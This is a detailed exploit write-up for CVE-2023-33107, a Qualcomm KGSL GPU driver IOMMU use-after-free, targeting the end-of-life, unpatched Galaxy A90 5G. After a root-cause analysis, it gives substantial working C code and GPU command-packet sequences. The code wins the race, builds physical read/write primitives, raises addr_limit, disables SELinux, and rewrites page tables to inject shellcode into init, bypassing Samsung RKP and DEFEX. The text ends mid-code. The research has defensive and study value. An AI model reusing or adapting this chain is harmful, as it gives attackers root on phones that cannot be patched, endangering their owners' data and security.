Galaxy A90 Full Exploit (CVE-2023-33107)

1) Introduction

This article details the process and results of achieving a full exploit on the Galaxy A90 5G(SM-A908N) by using the well-documented CVE-2023-33107 from https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2023/CVE-2023-33107.html.

The target device, Galaxy A90 5G, had its update support terminated before the vulnerability patch was released (the patch was released in January 2024), so the vulnerability remains unpatched on this device.

Everything below is based on Samsung Opensource A908NKSU5EWF1 & A908NKSU5EXE.

2) root cause

The vulnerability is described in detail at https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2023/CVE-2023-33107.html.

ioctl(kgsl_fd , IOCTL_KGSL_MAP_USER_MEM,…); with KGSL_USER_MEM_TYPE_ADDR, WRAP_SIZE

kgsl_ioctl_map_user_mem
	_map_usermem_addr
		kgsl_setup_useraddr
			kgsl_setup_anon_useraddr
				kgsl_mmu_set_svm_region
					kgsl_iommu_set_svm_region
						_insert_gpuaddr - ######### race_window_start
			memdesc_sg_virt
				kgsl_malloc
					vmalloc
					...
						__vmalloc_node_range if (!size || (size >> PAGE_SHIFT) > totalram_pages) fail
			kgsl_mmu_put_gpuaddr
				kgsl_mmu_unmap
					kgsl_iommu_put_gpuaddr
						_remove_gpuaddr
							rb_erase - ########### race_window_end
			return -ENOMEM;
					

In the above blog, we can see that the rbtree is temporarily corrupted due to integer overflow.

name                                  start        end          color
 /-[left] UAF                         0x7001ff000  0x710203000  red
BOGUS                                 0x700204000  0x700101000  black  [START][walkright]
 \-[right] PLACEHOLDER                0x710204000  0x720604000  red [walk left, nothing found]

arm_lpae_map_sg()

static int arm_lpae_map_sg(struct io_pgtable_ops *ops, unsigned long iova,
			   struct scatterlist *sg, unsigned int nents,
			   int iommu_prot, size_t *size)
{
	struct arm_lpae_io_pgtable *data = io_pgtable_ops_to_data(ops);
	arm_lpae_iopte *ptep = data->pgd;
	int lvl = ARM_LPAE_START_LVL(data);
	arm_lpae_iopte prot;
	struct scatterlist *s;
	size_t mapped = 0;
	int i, ret;
	unsigned int min_pagesz;
	struct io_pgtable_cfg *cfg = &data->iop.cfg;
	struct map_state ms;

	/* If no access, then nothing to do */
	if (!(iommu_prot & (IOMMU_READ | IOMMU_WRITE)))
		goto out_err;

	prot = arm_lpae_prot_to_pte(data, iommu_prot);

	min_pagesz = 1 << __ffs(cfg->pgsize_bitmap);

	memset(&ms, 0, sizeof(ms));

	for_each_sg(sg, s, nents, i) {
		phys_addr_t phys = page_to_phys(sg_page(s)) + s->offset;
		size_t size = s->length;

		/*
		 * We are mapping on IOMMU page boundaries, so offset within
		 * the page must be 0. However, the IOMMU may support pages
		 * smaller than PAGE_SIZE, so s->offset may still represent
		 * an offset of that boundary within the CPU page.
		 */
		if (!IS_ALIGNED(s->offset, min_pagesz))
			goto out_err;

		while (size) {
			size_t pgsize = iommu_pgsize(
				cfg->pgsize_bitmap, iova | phys, size);

			if (ms.pgtable && (iova < ms.iova_end)) { 
				arm_lpae_iopte *ptep = ms.pgtable +
					ARM_LPAE_LVL_IDX(iova, MAP_STATE_LVL,
							 data);
				arm_lpae_init_pte(
					data, iova, phys, prot, MAP_STATE_LVL,
					ptep, ms.prev_pgtable, false); **################ [B]**
				ms.num_pte++;
			} else {
				ret = __arm_lpae_map(data, iova, phys, pgsize, 
						prot, lvl, ptep, NULL, &ms);
				if (ret)
					goto out_err;
			}

			iova += pgsize;
			mapped += pgsize;
			phys += pgsize;
			size -= pgsize;
		}
	}

	if (ms.pgtable)
		pgtable_dma_sync_single_for_device(cfg,
			__arm_lpae_dma_addr(ms.pte_start),
			ms.num_pte * sizeof(*ms.pte_start),
			DMA_TO_DEVICE);

	/*
	 * Synchronise all PTE updates for the new mapping before there's
	 * a chance for anything to kick off a table walk for the new iova.
	 */
	wmb();

	return mapped;

out_err:
	/* Return the size of the partial mapping so that they can be undone */
	*size = mapped; **################ [C]**
	return 0;
}
static int arm_lpae_init_pte(struct arm_lpae_io_pgtable *data,
			     unsigned long iova, phys_addr_t paddr,
			     arm_lpae_iopte prot, int lvl,
			     arm_lpae_iopte *ptep, arm_lpae_iopte *prev_ptep,
			     bool flush)
{
	arm_lpae_iopte pte = *ptep;

	/* We require an unmap first */
	if (pte & ARM_LPAE_PTE_VALID) {
		WARN_RATELIMIT(1, "map without unmap\n");
		return -EEXIST; ############################ [A]
	}

arm_lpae_init_pte returns -EEXIST when there is a duplicate PTE. —[A]
But arm_lpae_map_sg does not handle this case, and even proceeds under the assumption that it was normally allocated. —[B]

Consider a scenario where allocation begins at 0x1FE000, overlapping with an existing allocation at 0x1FF000~

1: First allocation succeeds

Allocation at 0x1FE000 succeeds via __arm_lpae_map

2: Second allocation fails silently

Allocation at 0x1FF000 fails in arm_lpae_init_pte (duplicate PTE)

However, this error is not handled

The code proceeds as if allocation succeeded

3: Third allocation fails with error handling

When 0x200000iova < ms.iova_end becomes false (because iova_end is set in 2MB units), so instead of taking path [B], execution falls through to the else branch.

Allocation at 0x200000 via __arm_lpae_map fails

This error triggers the failure path (out_err)

4: Incorrect size calculation

Although only 0x1FE000 was actually allocated, the code sets size = mapped to 0x2000 —[C]

This results in reporting a successful allocation of two pages when only one was mapped

5: Incorrect unmap size calculation

The error handler calculates the unmap size incorrectly: size_to_unmap = iova + size - __saved_iova_start;

Since size = 0x2000 (incorrect value from 4), this leads to calling:arm_smmu_unmap(domain, __saved_iova_start, size_to_unmap);

6: Excessive PTE deletion

Inside arm_smmu_unmap, the following operation occurs

memset(table, 0, table_len);

This deletes PTEs for both 0x1FE000 and 0x1FF000, even though

0x1FE000 was newly allocated (should be unmapped)

0x1FF000 belonged to an existing allocation (should remain intact)

7: Use-After-Free trigger

When the kernel later attempts to unmap the existing mapping at 0x1FF000~, the following call chain is triggered

kgsl_mem_entry_destroy → kgsl_sharedmem_free → kgsl_mmu_put_gpuaddr

void kgsl_mmu_put_gpuaddr(struct kgsl_memdesc *memdesc)
{
	struct kgsl_pagetable *pagetable = memdesc->pagetable;
	int unmap_fail = 0;

	if (memdesc->size == 0 || memdesc->gpuaddr == 0)
		return;

	if (!kgsl_memdesc_is_global(memdesc) && (KGSL_MEMDESC_MAPPED & memdesc->priv))
		unmap_fail = kgsl_mmu_unmap(pagetable, memdesc);

	/*
	 * Do not free the gpuaddr/size if unmap fails. Because if we
	 * try to map this range in future, the iommu driver will throw
	 * a BUG_ON() because it feels we are overwriting a mapping.
	 */
	if (PT_OP_VALID(pagetable, put_gpuaddr) && (unmap_fail == 0)) **####### [D]**
		pagetable->pt_ops->put_gpuaddr(memdesc);

	memdesc->pagetable = NULL;

	/*
	 * If SVM tries to take a GPU address it will lose the race until the
	 * gpuaddr returns to zero so we shouldn't need to worry about taking a
	 * lock here
	 */
	if (!kgsl_memdesc_is_global(memdesc))
		memdesc->gpuaddr = 0;

}

Analysis of the code reveals that even if kgsl_mmu_unmap fails PTE validation and returns an error, there are no meaningful consequences other than skipping the pagetable->pt_ops->put_gpuaddr(memdesc); call. —[D]

Therefore, it is confirmed in the kgsl_sharedmem_free code that the physical memory is freed —[F] regardless of the unmap operation’s success or failure —[E]

void kgsl_sharedmem_free(struct kgsl_memdesc *memdesc)
{
	if (memdesc == NULL || memdesc->size == 0)
		return;

	/* Make sure the memory object has been unmapped */
	kgsl_mmu_put_gpuaddr(memdesc); **####### [E]**

	if (memdesc->ops && memdesc->ops->free)
		memdesc->ops->free(memdesc); **####### [F]**

	if (memdesc->sgt) {
		sg_free_table(memdesc->sgt);
		kfree(memdesc->sgt);
	}

	memdesc->page_count = 0;
	if (memdesc->pages)
		kgsl_free(memdesc->pages);
	memdesc->pages = NULL;

}

Ultimately, an IOMMU Use-After-Free (UAF) condition is established. When the freed physical memory is reallocated and reused by the kernel, the GPU can still perform Read/Write (R/W) operations on that memory using the stale, dangling PTEs.

3) Exploit Background

CVE-2023-33107 is a vulnerability in the KGSL (Kernel Graphics Support Layer) driver, which manages Qualcomm’s Adreno GPU. As analyzed in the previous section, the core of this vulnerability lies in triggering an IOMMU UAF (Use-After-Free) condition through a race condition.

This UAF state means that while the kernel considers the physical memory freed, the GPU still maintains an accessible mapping (dangling PTE) to it. Therefore, to leverage this UAF into an actual exploit, an attacker must read from or write to that memory region using the GPU, not the CPU.

In other words, triggering this vulnerability requires understanding the communication protocol (ioctl) with the KGSL driver, and constructing primitives to manipulate kernel memory through the obtained dangling pointer requires understanding the GPU command structure.

How to Use Adreno GPU

The core operation of the Adreno GPU involves the following steps

  1. The CPU writes GPU commands (PM4 packets) into memory (Indirect Buffer, IB).
  2. The CPU submits the IB to the KGSL driver via ioctl.
  3. The KGSL driver queues the IB into the GPU ringbuffer.
  4. The GPU Command Processor (CP) reads the ringbuffer, fetches the IB via DMA, and executes it asynchronously.

Execution Flow

Userspace → ioctl(/dev/kgsl-3d0) → KGSL Driver → GPU Command Processor

Each layer’s role is

Userspace: Write PM4 packets into IB and submit via ioctl

KGSL Driver: Manage GPU Virtual Address (IOMMU address space) and submit queue control

GPU Command Processor (CP): Parse and execute command stream (PM4 packets)

Commands used in KGSL are divided into two levels

(A) KGSL ioctl (driver interface)

Commands that request to the driver such as IOCTL_KGSL_GPUOBJ_ALLOC, IOCTL_KGSL_GPU_COMMAND

(B) GPU CP command stream

Commands that GPU directly executes such as CP_MEM_WRITE, CP_MEM_TO_MEM

(A) KGSL ioctl

Context creation: IOCTL_KGSL_DRAWCTXT_CREATE

GPU commands are submitted/managed in context units, and each context has separated timestamp-based progress state.

struct kgsl_drawctxt_create ctx = {
        .flags = KGSL_CONTEXT_PREAMBLE | KGSL_CONTEXT_NO_GMEM_ALLOC
    };
if (ioctl(fd, IOCTL_KGSL_DRAWCTXT_CREATE, &ctx) != 0) ...

GPU object management: IOCTL_KGSL_GPUOBJ_*

KGSL manages memory accessible by GPU as GPU objects

ALLOC: Create GPU object

INFO: Query object’s gpuaddr (GPU VA)

This gpuaddr is the address used in PM4 packets

FREE: Deallocate object

Main buffers used in exploit

IB (Indirect Buffer): CPU writes PM4 packets, GPU reads and executes

dst: GPU writes results, CPU reads (for leak/dump)

CPU mapping

GPU objects are allocated by kernel, but CPU access is needed to fill contents.

Map to CPU VA using mmap(/dev/kgsl-3d0, offset=id<<12) + KGSL_MEMFLAGS_USE_CPU_MAP flag and write IB.

struct kgsl_gpuobj_alloc dst_alloc = {
        .size  = PAGE_SIZE,
        .flags = KGSL_MEMFLAGS_USE_CPU_MAP
  };
if (ioctl(fd, IOCTL_KGSL_GPUOBJ_ALLOC, &dst_alloc) != 0) {
    goto cleanup;
}
dst_id = dst_alloc.id;
dst_vma = mmap(NULL, dst_alloc.mmapsize, PROT_READ | PROT_WRITE,
               MAP_SHARED, fd, ((off_t)dst_id) << 12);

Submit: IOCTL_KGSL_GPU_COMMAND

Stage to instruct GPU to execute IB

  1. Pass IB information to cmdlist[] in { gpuaddr, size, flags, id } format
  2. Submit with specified context_id
  3. Receive timestamp on success

Timestamp is a handle to track GPU execution progress of the batch.

struct kgsl_drawctxt_create ctx = {
        .flags = KGSL_CONTEXT_PREAMBLE | KGSL_CONTEXT_NO_GMEM_ALLOC
    };
    if (ioctl(fd, IOCTL_KGSL_DRAWCTXT_CREATE, &ctx) != 0) {
    }
    ctx_id = ctx.drawctxt_id;

    struct kgsl_gpuobj_alloc ib_alloc = {
        .size  = PAGE_SIZE * 8,
        .flags = KGSL_MEMFLAGS_USE_CPU_MAP
    };
    if (ioctl(fd, IOCTL_KGSL_GPUOBJ_ALLOC, &ib_alloc) != 0) {
        goto cleanup;
    }
    ib_id = ib_alloc.id;
    ib_vma = mmap(NULL, ib_alloc.mmapsize, PROT_READ | PROT_WRITE,
                  MAP_SHARED, fd, ((off_t)ib_id) << 12);

    struct kgsl_gpuobj_info info = { .id = ib_id };
    ioctl(fd, IOCTL_KGSL_GPUOBJ_INFO, &info);
    ib_gpu = info.gpuaddr;
    
    
    uint32_t *cmd = (uint32_t *)ib_vma;
	  cmd[dw++] = cp_type7_packet(CP_NOP, 0);

    size_t ib_bytes = (size_t)dw * 4;

    struct kgsl_command_object cmd_obj = {
        .gpuaddr = ib_gpu,
        .size    = ib_bytes,
        .flags   = KGSL_CMDLIST_IB,
        .id      = ib_id
    };

    struct kgsl_gpu_command gpu_cmd = {0};
    gpu_cmd.cmdlist    = (uint64_t)(uintptr_t)&cmd_obj;
    gpu_cmd.cmdsize    = sizeof(cmd_obj);
    gpu_cmd.numcmds    = 1;
    gpu_cmd.context_id = ctx_id;

    if (ioctl(fd, IOCTL_KGSL_GPU_COMMAND, &gpu_cmd) != 0) {

Polling: IOCTL_KGSL_CMDSTREAM_READTIMESTAMP_CTXTID

GPU execution is asynchronous, so polling is needed to check completion

static int wait_timestamp(int fd, unsigned ctx_id, unsigned target)
{
    struct kgsl_cmdstream_readtimestamp_ctxtid r = {0};
    r.context_id = ctx_id; 
    r.type = KGSL_TIMESTAMP_RETIRED;
    
    for (unsigned spins=0; spins<100000; ++spins) {
        if (ioctl(fd, IOCTL_KGSL_CMDSTREAM_READTIMESTAMP_CTXTID, &r) != 0) 
            return -1;
        if (r.timestamp >= target) 
            return 0;
        usleep(100); 
    }
    return -2;
}

(B) GPU CP command stream (PM4)

PM4 packet structure

IB (Indirect Buffer) is a 32-bit dword array, with PM4 packets sequentially placed inside.

GPU’s Command Processor (CP) reads this via DMA, parses the header to identify opcode and payload size, then executes.

Type-7 packet

Type-7 packet structure mainly used in exploit code

[Header: 1 dword] [Payload: cnt dwords]

Header composition (1 dword)

type7: Packet type identifier

opcode: Type of command to execute

cnt: Number of payload dwords that follow

parity: Packet integrity verification bit

Payload (cnt dwords)

Meaning varies by opcode

Examples: address, value, flags, etc.

CPU writes PM4 packets into memory, and GPU CP fetches and executes them.

static inline uint32_t cp_type7_packet(uint32_t opcode, uint32_t cnt)
{
    return (7u << 28)
         | ((cnt & 0x3FFFu) << 0)
         | (pm4_calc_odd_parity_bit(cnt) << 15)
         | ((opcode & 0x7Fu) << 16)
         | (pm4_calc_odd_parity_bit(opcode) << 23);
}

PM4 opcodes used in exploit code

CP_MEM_WRITE (write primitive)

Write specific value to specific address

Payload typically contains

  1. dst address (64-bit as lo/hi)
  2. value (32-bit)

Here dst is GPU VA. This means KGSL must have mapped that GPU VA via IOMMU.

wcmd[dw++] = cp_type7_packet(CP_MEM_WRITE, 3);
wcmd[dw++] = dst_lo;
wcmd[dw++] = dst_hi;
wcmd[dw++] = value;

CP_MEM_TO_MEM (copy / read primitive)

Read from src and copy to dst

Used as typical read primitive for CPU to read

Payload typically contains

  1. Control field
  2. dst address (lo/hi)
  3. src address (lo/hi)

CP_MEM_TO_MEM = src GPU VA -> dst GPU VA copy

This enables dumping from arbitrary addresses within GPU-readable range.

vcmd[dw++] = cp_type7_packet(CP_MEM_TO_MEM, 5);
vcmd[dw++] = 0x00000000; //control: 0x0 -> 32bit mode
vcmd[dw++] = dst_lo;
vcmd[dw++] = dst_hi;
vcmd[dw++] = src_lo;
vcmd[dw++] = src_hi;

4) Exploit

4.1 Bug Trigger & Primitives

Memory Layout

The address layout follows the configuration described in the Google Project Zero blog (with a minor size adjustment due to memory constraints during the spray phase).

OVERLAP:        0x7001fe000 -> 0x700205000 (size: 0x7000)
UAF:            0x7001ff000 -> 0x710203000 (size: 0x10004000)
BOGUS:          0x700204000 -> 0x700101000 (size: 0xffffffffffefd000)
PLACEHOLDER:    0x710204000 -> 0x720604000 (size: 0x10400000 -> 0x10000 )

Trigger the bug

With UAF and PLACEHOLDER mapped according to the layout above, when inserting the BOGUS range, the gpuaddr + size wrap-around breaks the rbtree’s overlap check.

During that brief window (while BOGUS still exists in the rbtree), if the OVERLAP range is inserted, the overlap with UAF goes undetected. Subsequently, when OVERLAP is mapped while BOGUS still exists in the rbtree, it fails due to the existing (UAF) PTE.

However, the code does not check for this failure and still increments the mapped PTE count, causing unmap to additionally delete the first IOMMU PTE of UAF (setting it to 0).

In this state, when UAF is freed, the unmap path stops at the first zero PTE, leaving the remaining IOMMU PTEs intact while the physical pages are freed and returned to the kernel, resulting in IOMMU dangling PTEs.

Primitives

With the IOMMU-side dangling PTE, when the physical page corresponding to the PTE is reused as an object

  1. Arbitrary Physical Read is possible through CP_MEM_TO_MEM
  2. Arbitrary Physical Write is possible through CP_MEM_WRITE

4.2 Exploitation Challenges: Bypasses RKP and DEFEX

1. Slab Metadata Forgery

https://i.blackhat.com/BH-US-23/Presentations/US-23-Lin-bad_io_uring-wp.pdf

In the above publication

credential validation was performed via

security_integrity_current()
is_kdp_invalid_cred_sp(cred, cred->security) 

This checked whether pointers were in protected cred/tsec regions using is_kdp_protect_addr(cred/cred+size, sec_ptr/sec_ptr+size)

The core validation logic was

page = virt_to_head_page(objp)
s = page->slab_cache
if (s == cred_jar_ro || s == tsec_jar)

The protection decision was based on slab page metadata rather than actual protection state. If the metadata could be corrupted, an attacker could forge slab_cache to point to cred_jar_ro/tsec_jar, allowing fake credentials to pass validation as protected objects.

Current Target: Metadata Forgery No Longer Works

On the current target device, validation uses

rkp_is_valid_cred_sp((u64)current_cred(), (u64)current_cred()->security)

The key checks are

rkp_ro_page(cred)
...
rkp_ro_page(cred + sizeof(struct cred))
..

rkp_ro_page() does not rely on metadata like “slab cache name”. Instead, it chains through rkp_is_pg_protected() and ultimately validates using

rkp_check_bitmap(__pa(addr), rkp_s_bitmap_ro, ...)

Validation is now based on the RO bitmap (protection state set by the hypervisor), not slab metadata. Simply forging slab metadata can no longer trick the system into accepting fake credentials as protected objects, making this bypass technique infeasible on the current target.

2. The orderly_poweroff Method

https://blackhat.com/docs/us-17/thursday/us-17-Shen-Defeating-Samsung-KNOX-With-Zero-Privilege.pdf

In the above publication, the exploit overwrote function pointers in ptmx_fops to directly call orderly_poweroff(), and gained control by overwriting the writable poweroff_cmd string.

However, on the current target device, ptmx_fops is marked as __ro_after_init, making ops overwrite infeasible.

Instead, I successfully

  1. Leaked task_struct addresses using values like task_struct->next->prev
  2. Overwrote restart_block->fn with orderly_poweroff()
  3. Overwrote poweroff_cmd to gain control
  4. Executed arbitrary scripts with root privileges on an unlocked device

DEFEX Restrictions on Locked Devices

However, on locked devices, DEFEX prevents execution of scripts that are not in the predefined whitelist with root privileges. Additionally, since sh is not in the whitelist, obtaining a shell is impossible.

DEFEX Bypass via PID 1

Examining the code below reveals that when pid == 1task_defex_enforce() immediately returns 0, meaning DEFEX does not block execution regardless of root status

#define DEFEX_ALLOW 0
...

int ret = DEFEX_ALLOW;
...

if (!p || p->pid == 1 || !p->mm || !is_task_used(p))
    return ret;

...

retval = task_defex_enforce(current, file, -__NR_execve);
if (retval < 0) {
    ...
    retval = -EPERM;
}

3. The Breakthrough: Targeting init (PID 1)

https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/

From above blog post, I learned that by overwriting Logline() in init’s libbase.so with shellcode, it’s possible to cleanly execute code as pid == 1.

Even though page tables are marked as rkp_ro, they can still be manipulated by allocating pages to the IOMMU UAF region via mmap spray. This enables bypassing both RKP and DEFEX.

4.3 Entire Flow

Stage 1: Setting & Trigger (IOMMU dangling PTE)

  1. Prepare a preliminary orphan process for invoking LogLine, shellcode, and a shared buffer to be used for communication with child processes.
int pid = fork();
    if (!pid) {
        int pid2 = fork();
        if (!pid2){
            while(1){
                if(gbuf[FOUND_PID]==0x12){
                    sleep(2);
                    gbuf[CALL_LOGLINE]=0x11; //pid2's ppid have to be 1 (init)
                    return 0;
                }
                usleep(100000);
                
            }
        }
        else{
            while(1){
                if(gbuf[FOUND_PID]==0x11){
                    gbuf[FOUND_PID]=0x12;
                    _exit(1);
                }
                sleep(1);
            } 
        }
  1. Allocate everything except bogus using IOCTL_KGSL_GPUOBJ_ALLOC (KGSL_MEMFLAGS_USE_CPU_MAP). (For bogus, it must be allocated with IOCTL_KGSL_MAP_USER_MEM (KGSL_MEMFLAGS_USE_CPU_MAP).)
  2. For uaf, perform mmap(...fd) at a predetermined address to insert it into the rbtree, then unmap it for later bogus insertion. (At this point, uaf is not removed from the rbtree.)
static void *mmap_gpuobj_fixed(int fd, unsigned int id, uint64_t mmapsize, 
                                void *fixed_addr)
{
    off_t offset = ((off_t)id) << 12;
    size_t len = mmapsize;
    void *p = mmap(fixed_addr, len, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_FIXED, fd, offset);
    return p;
}
  1. Similarly for placeholder, perform mmap(...fd) to insert it into the rbtree.
  2. In pthread_create(&bogus_thread, NULL, bogus_racer, &rs);, trigger a race condition where IOCTL_KGSL_MAP_USER_MEM is called with a size that causes integer overflow to register bogus in the rbtree, and during the time window between when kgsl_malloc fails and bogus is removed from the rbtree, overlap is registered in the rbtree via mmap(...fd).
static void *bogus_racer(void *arg)
{
		...
    int ret = ioctl(rs->fd, IOCTL_KGSL_MAP_USER_MEM, &req);
}
pthread_create(&bogus_thread, NULL, bogus_racer, &rs);
 ...
// Race window delay 
usleep(200);
overlap_vma = mmap_gpuobj_fixed(fd, overlap_id, overlap_mmapsize, (void *)(uintptr_t)OVERLAP_START);
  1. If an ENODEV error occurs, it succeeded, so perform IOCTL_KGSL_GPUOBJ_FREE on uaf. (The first PTE is overwritten with 0, creating an IOMMU dangling PTE at this point, and those pages are returned to the kernel.)
 if (overlap_vma == MAP_FAILED && mmap_errno == 19) {  // ENODEV
        fprintf(stderr, "\n[!] RACE CONDITION WON!\n");
        success = 1;
    }
struct kgsl_gpuobj_free uaf_free = {0};
uaf_free.id = uaf_id;
if (ioctl(fd, IOCTL_KGSL_GPUOBJ_FREE, &uaf_free) == 0) {
    fprintf(stderr, "    UAF freed (id=%u)\n", uaf_id);
    uaf_id = 0;
}

Stage 2: SELinux Bypass

  1. Induce task_struct to be created on new pages by pressuring memory through fork spray.
for (int i = 0; i < spray_count; i++) {
            pid_t pid = fork();
            if (pid == 0) {
                char proc_name[16];  // TASK_COMM_LEN
                memset(proc_name,0,16);
                pid_t self = getpid();
                snprintf(proc_name, sizeof(proc_name), "%s%05d", MARKER_NAME, self);
                prctl(PR_SET_NAME, proc_name, 0, 0, 0);
  1. Through the scan_uaf_for_nonzero_multi function, scan all IOMMU dangling PTEs obtained in Stage 1 by reading/writing using CP_MEM_WRITE and CP_MEM_TO_MEM to find the first task_struct.
##################### DUMP ############################
for (int i = 0; i < 1024; i++) {
    uint32_t d_lo, d_hi, s_lo, s_hi;
    split64(dst_gpu + (uint64_t)i * 4, &d_lo, &d_hi);
    split64(current_va + (uint64_t)i * 4, &s_lo, &s_hi);

    cmd[dw++] = cp_type7_packet(CP_MEM_TO_MEM, 5);
    cmd[dw++] = 0x00000000;
    cmd[dw++] = d_lo;
    cmd[dw++] = d_hi;
    cmd[dw++] = s_lo;
    cmd[dw++] = s_hi;
}
...
if (ioctl(fd, IOCTL_KGSL_GPU_COMMAND, &gpu_cmd) != 0) {

#########################  Find KETO0422 pattern  ##################
pid_t comm_pid = -1;
int comm_off = -1;
for (int off = 0; off < 4096 - 8; off++) {
    if (memcmp(bytes + off, "KETO0422", 8) == 0) {
        fprintf(stderr,
                "        [+] Found KETO0422 at offset 0x%03x\n", off);
        ...
    }
}
  1. Overwrite the value of addr_limit at 0x40 offset in the task_struct found by scan from USER_DS to KERNEL_DS value.
split64(target_addr, &t_lo, &t_hi);
wcmd[dw++] = cp_type7_packet(CP_MEM_WRITE, 3);
wcmd[dw++] = t_lo;
wcmd[dw++] = t_hi;
wcmd[dw++] = kds_lo;

split64(target_addr + 4, &t_lo, &t_hi);
wcmd[dw++] = cp_type7_packet(CP_MEM_WRITE, 3);
wcmd[dw++] = t_lo;
wcmd[dw++] = t_hi;
wcmd[dw++] = kds_hi;

...

if (ioctl(fd, IOCTL_KGSL_GPU_COMMAND, &patch_cmd) != 0) {
  1. Save kbase to the shared buffer (kbase leak) through the kbase related value at 0x888 offset in the task_struct found by scan, and set the flag .do_action corresponding to the pid to 1.
...
ptr_val = (*(uint64_t *)(bytes + 0x888)) -0x2BB8CF8; //kbase
*(uint64_t *)&gbuf[0x20] = ptr_val;
...

if (comm_pid >0 && spray_ctrl != NULL){
  for (int si=0; si<spray_count;si++){
      if (spray_ctrl[si].pid == comm_pid){
          fprintf(stderr," [*] Trigger spary slot %d (pid=%d)\n",si,spray_ctrl[si].pid);
          spray_ctrl[si].do_action=1;
          *(uint64_t *)&gbuf[TARGET_PIDPID] = spray_ctrl[si].pid;
          scc=1;

      }
  }
}
  1. kill and waitpid all except that pid.
for (int i = 0; i < spray_count; i++) {
        if(spray_ctrl[i].do_action==0){
            kill(spray_ctrl[i].pid,SIGTERM);
        }
    }
    for (int i = 0; i < spray_count; i++) {
        if(spray_ctrl[i].do_action==0){
            waitpid(spray_ctrl[i].pid,NULL,0);
        }
    }
  1. Since that pid has addr_limit set to KERNEL_DS, it can overwrite selinux_enforcing to 0, so overwrite it. (Since userland addresses cannot be used, overwrite it using read(fd_zero,...).)

Stage 3: PTE Overwrite (Page Table Manipulation)

  1. Induce the creation of many unusual page tables where only the 1st, 3rd, 5th, 7th, and 9th pages are allocated through mmap_spray in 0x200000 units.
static void mmap_spray(void)
{
    
	fprintf(stderr, "\n[13] mmap-spraying user VA space\n");
	mmap_spray_done = 0;
	for (int i = 0; i < MMAP_SPRAY_COUNT; i++) {
		uint8_t *addr = (uint8_t *)(MMAP_SPRAY_BASE + i * MMAP_SPRAY_STRIDE);
		void *p;
        for(int j = 0 ; j < 5; j++){
            p = mmap(addr + PAGE_SIZE * (uint64_t)sig_num[j] , PAGE_SIZE,
		         PROT_READ | PROT_WRITE,
		         MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
		         -1, 0);
            *(volatile uint8_t *)p = sig_num[j];                 
		    if ((uint64_t)p != (uint64_t)addr + PAGE_SIZE * (uint64_t)sig_num[j]) { fprintf(stderr,"mmap_spray"); break; }
            
        }
		
		
		mmap_spray_done++;
	}
}
  1. Similar to Stage 2, scan for the pattern of unusual page tables where only the 1st, 3rd, 5th, 7th, and 9th entries are allocated using the IOMMU dangling PTE.
//data is dumped PTE (dword)
if (non_zero == 10 &&
			    data[2] && data[3] && data[6] && data[7] && data[10] && data[11] && data[14] && data[15] && data[18] && data[19] ) {
				const uint32_t f53_mask = 0xFFF;
				const uint32_t f53_tag  = 0xF53;
				if (((data[2] & f53_mask) == f53_tag) &&
				    ((data[6] & f53_mask) == f53_tag)) {
  1. In that page, back up the 1st PTE value and overwrite the 1st PTE with the 3rd PTE value. (Using GPU read/write)
//data is dumped PTE (dword)
for (int i = 0; i < 4; i++)
					wcmd[wdw++] = cp_type7_packet(CP_NOP, 0);

				uint32_t t_lo, t_hi;

				split64(current_va+8, &t_lo, &t_hi);
				wcmd[wdw++] = cp_type7_packet(CP_MEM_WRITE, 3);
				wcmd[wdw++] = t_lo;
				wcmd[wdw++] = t_hi;
				wcmd[wdw++] = data[6];

				split64(current_va + 12, &t_lo, &t_hi);
				wcmd[wdw++] = cp_type7_packet(CP_MEM_WRITE, 3);
				wcmd[wdw++] = t_lo;
				wcmd[wdw++] = t_hi;
				wcmd[wdw++] = data[7];

					...
					uint64_t *save_pte0 = (uint64_t *)(gbuf + PTE_SAVE_BASE + (*rb_count) * 8);
					*save_pte0 = ((uint64_t)data[3] << 32) | data[2];
					(*rb_count)++;
				}
...

				if (ioctl(fd, IOCTL_KGSL_GPU_COMMAND, &patch_cmd) == 0
  1. Through mmap_check, find the page table that was manipulated above, where reading the 1st page returns the value of the 3rd page.
static void mmap_check(void)
{
    uint64_t * check_addr = (uint64_t *)&gbuf[0xa00];
    int cnt = 0;
    uint32_t *corrupt_cnt = (uint32_t *)(gbuf + MMAP_CORRUPT_CNT);
	fprintf(stderr, "\n[14] mmap-checking user VA space\n");
	*corrupt_cnt = 0;
    for (int i = 0; i < MMAP_SPRAY_COUNT; i++) {
		uint8_t *addr = (uint8_t *)(MMAP_SPRAY_BASE + i * MMAP_SPRAY_STRIDE);
        uint8_t * pp =addr + PAGE_SIZE * (uint64_t)sig_num[0];
		if (*(volatile uint8_t *)pp != sig_num[0]){ // PFN write success
            fprintf(stderr,"PFN corrupted!!\n");
            gb_target_addr = (uint64_t)addr;
     ...
     
  1. Allocate the libbase.so shared library starting from the 0x10th PTE of that page table. (At this time, the code region of LogLine in libbase.so exists at 0x130 offset in that page table.)
  2. Extract only the PFN from the PTE at 0x130 offset and put it into the 1st PTE. (Using GPU read/write)
uint64_t orig =  *(uint64_t *)((uint8_t *)dump_vma + 8*sig_num[0]);
  uint64_t pte1 = *(uint64_t *)((uint8_t *)dump_vma + 8*sig_num[1]);
  uint64_t src = *(uint64_t *)((uint8_t *)dump_vma + 0x130);

  const uint64_t PFN_MASK = PHYS_MASK & PAGE_MASK;
  uint64_t orig_pfn = orig & PFN_MASK;
  uint64_t pte1_pfn = pte1 & PFN_MASK;
  uint64_t src_pfn = src & PFN_MASK;

  if (src_pfn == 0){
      fprintf(stderr,
              "       [!] Skip patch: src PFN at 0x130 is empty VA : 0x%llx\n",
              (unsigned long long)va);
      continue;
  }
  uint64_t new_pte = (orig & ~PFN_MASK) | src_pfn;
  uint64_t copied_pfn = src_pfn;
  cmd = (uint32_t *)ib_vma2;
  for (int i=0; i<4; i++){
      cmd[dw++] = cp_type7_packet(CP_NOP,0);
  }
  split64(va+ (uint64_t)sig_num[0]*8 ,&d_lo,&d_hi);
  cmd[dw++] = cp_type7_packet(CP_MEM_WRITE,3);
  cmd[dw++] = d_lo;

  cmd[dw++] = d_hi;
  cmd[dw++] = (uint32_t) (new_pte & 0xffffffffu);

  split64(va+4+(uint64_t)sig_num[0]*8 , &d_lo, &d_hi);
  cmd[dw++] = cp_type7_packet(CP_MEM_WRITE,3);
  cmd[dw++] = d_lo;
  cmd[dw++] = d_hi;
